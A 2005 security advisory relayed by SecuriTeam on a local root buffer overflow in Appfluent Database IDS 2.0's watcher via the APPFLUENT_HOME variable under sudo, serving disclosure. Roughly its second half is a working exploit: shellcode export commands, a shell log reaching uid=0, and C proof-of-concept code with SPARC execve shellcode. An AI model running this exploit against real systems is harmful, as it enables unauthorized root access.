[UNIX] Appfluent Database IDS Local Buffer Overflow
- From: SecuriTeam <support@xxxxxxxxxxxxxx>
- Date: 8 Dec 2005 15:50:19 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Appfluent Database IDS Local Buffer Overflow
------------------------------------------------------------------------
SUMMARY
"Appfluent Technology provides a suite of data usage and query
performance software designed to help IT organizations reduce the number
of databases they maintain, improve performance of Business Intelligence
(BI) and enterprise applications, and quickly deploy new applications."
Improper length validation of the APPFLUENT_HOME environment variable
allows a local attacker to supply an over-long value and, when the watcher
process is run through sudo, execute arbitrary code with root privileges.
DETAILS
Vulnerable Systems:
* Appfluent Database IDS version 2.0
Immune Systems:
* Appfluent Database IDS version 2.1.0.103
Appfluent's Database IDS monitors all SQL traffic in real time, logging
every user-defined transaction to a database and providing an audit trail
of all transactions that take place. Several processes work together to
provide the IDS solution, including watcher, analyzer, alerter and
reporter.
All of the binaries contain a stack-based buffer overflow that allows a
malicious local user to gain unauthorized code execution on the system
where the application is installed. Because the value of $APPFLUENT_HOME
is copied with strcpy() and without any bounds checking, a user can set
that environment variable to an over-long value and overflow the stack
buffer.
The root-level impact is specific to the watcher process, which must run
as root because it sniffs all traffic on an interface. A script installed
in $APPFLUENT_HOME/server_oracle/bin is supplied so that administrators can
run the process via sudo.
Running it via sudo provides a vector for root compromise, because a
default sudo install on many operating systems at the time of this
advisory passes the caller's environment variables through to the command
unchanged. An attacker who sets $APPFLUENT_HOME to a malicious value and
then runs the watcher process through sudo therefore gains root access to
the system. (Later sudo releases, from 1.6.9 onward, enable env_reset by
default, which closes this vector unless the administrator has disabled it
or added APPFLUENT_HOME to env_keep.)
A few requirements must be met for the attack to succeed:
1) The user is in the sudoers file and is permitted to run the watcher
process
2) sudo honors environment variables, meaning env_reset or a similar
restriction is not set
Note that users must set $APPFLUENT_HOME, or have it set for them, for the
product to work at all, so if the two requirements above are met an
attacker is guaranteed to gain unauthorized root access to the system.
Proof of Concept:
/*###
## Proof run with a default sudo install from sunfreeware.
###
[c0ntex@ ~/vuln]$ export SHELLCODE=`printf "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x82\x10\x20\x18\x91\xd0\x20\x08\x90\x02\x60\x01\x90\x22\x20\x01\x92\x10\x3f\xff\x82\x10\x20\xca\x91\xd0\x20\x08\x82\x10\x20\x2f\x91\xd0\x20\x08\x90\x02\x60\x01\x90\x22\x20\x01\x92\x10\x3f\xff\x82\x10\x20\xcb\x91\xd0\x20\x08\x94\x1a\x80\x0a\x21\x0b\xd5\x9a\xa0\x14\x21\x6e\x23\x0b\xcb\xdc\xa2\x14\x63\x68\xd4\x23\xbf\xfc\xe2\x23\xbf\xf8\xe0\x23\xbf\xf4\x90\x23\xa0\x0c\xd4\x23\xbf\xfd\xd0\x23\xbf\xec\x92\x23\xa0\x14\x82\x10\x20\x3b\x91\xd0\x20\x08\x82\x10\x20\x01\x91\xd0\x20\x08"`
[c0ntex@ ~/vuln]$ export APPFLUENT_HOME=`perl -e 'print "A" x 576'``printf "\xff\xbe\xfa\xd0\xff\xbe\xfa\xd0"`
[c0ntex@ ~/vuln]$ sudo /tmp/watch/watcher -sc
Password:
Version: 2.0.0.103
do_process: Exception:
file: file_stream.cpp
line: 338
message: FileStream: fopen :
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
oracle
/config/config : 78 : File name too long
code: 78
stack:
#0 void IC::ConfigFile::load(IC::StrP) at config_file.cpp:35
#1 virtual void IC::ServerConfig::load() at /home/ask/lab/v2_0/app/product/server/lib/libserverconfig/server_config.cpp:70
#2 virtual void IC::Watch::run(bool, bool) at /home/ask/lab/v2_0/app/product/server/lib/libwatch/watch.cpp:41
#3 int do_process(bool) at /home/ask/lab/v2_0/app/product/server/bin/watch/do_process.cpp:21
#
#
# uname -a
SunOS 5.8 Generic_117350-24 sun4u sparc SUNW,UltraAX-i2
#
# id -a
uid=0(root) gid=1(other)
groups=1(other),0(root),2(bin),3(sys),4(adm),5(uucp),6(mail),7(tty),8(lp),9(nuucp),12(daemon)
#
Greetings to everyone I know ;-)
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define DAHBUF 591                  /* bytes of padding before the saved return address */
#define NOP    0x90                 /* sled filler: repeated 0x90 is a harmless SPARC instruction */
#define SUDO   "/usr/local/bin/sudo"
#define VULN   "watcher"
#define WOPT   "-sc"

/* SPARC/Solaris shellcode: execve("/bin/ksh") */
char shellcode[] =
"\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff\x90\x03\xe0\x20"
"\x92\x02\x20\x10\xc0\x22\x20\x08\xd0\x22\x20\x10\xc0\x22\x20\x14"
"\x82\x10\x20\x0b\x91\xd0\x20\x08/bin/ksh";

/* two nearby guesses at the address of the NOP sled inside the environment string */
char retloc[] = "\xff\xbe\xfd\xe9";
char retlok[] = "\xff\xbe\xfd\xed";

int main()
{
    char env[DAHBUF+9];   /* DAHBUF bytes of sled + two return addresses + NUL */

    puts("\nLocal root proof of concept for Appfluent IDS Watcher environment overflow");
    puts("found and developed by c0ntex || c0ntexb@xxxxxxxxx || www.open-security.org\n");

    /* fill the value with NOPs, place the shellcode 100 bytes in,
     * then append the return address twice after DAHBUF bytes */
    memset(env, NOP, DAHBUF);
    memcpy(env + 100, shellcode, strlen(shellcode));
    memcpy(env + DAHBUF, retloc, strlen(retloc));
    memcpy(env + DAHBUF + 4, retlok, strlen(retlok));
    env[DAHBUF+8] = '\0';   /* last valid index; writing env[DAHBUF+9] would be one byte past the array */

    /* overwrite the first 15 sled bytes with the variable name; strncpy with
     * exactly 15 copies no terminating NUL, so the sled follows the '=' directly */
    strncpy(&env[0], "APPFLUENT_HOME=", 15);

    if(putenv(env) != 0) {
        perror("putenv");
        return(EXIT_FAILURE);
    }

    /* sudo passes our environment through and runs the watcher as root */
    if(execl(SUDO, SUDO, VULN, WOPT, (char *)NULL) < 0) {
        perror("execl");
        return(EXIT_FAILURE);
    }
    return(EXIT_SUCCESS);
}
ADDITIONAL INFORMATION
The information has been provided by c0ntex <mailto:c0ntexb@xxxxxxxxx>.
The original article can be found at:
http://www.open-security.org/advisories/14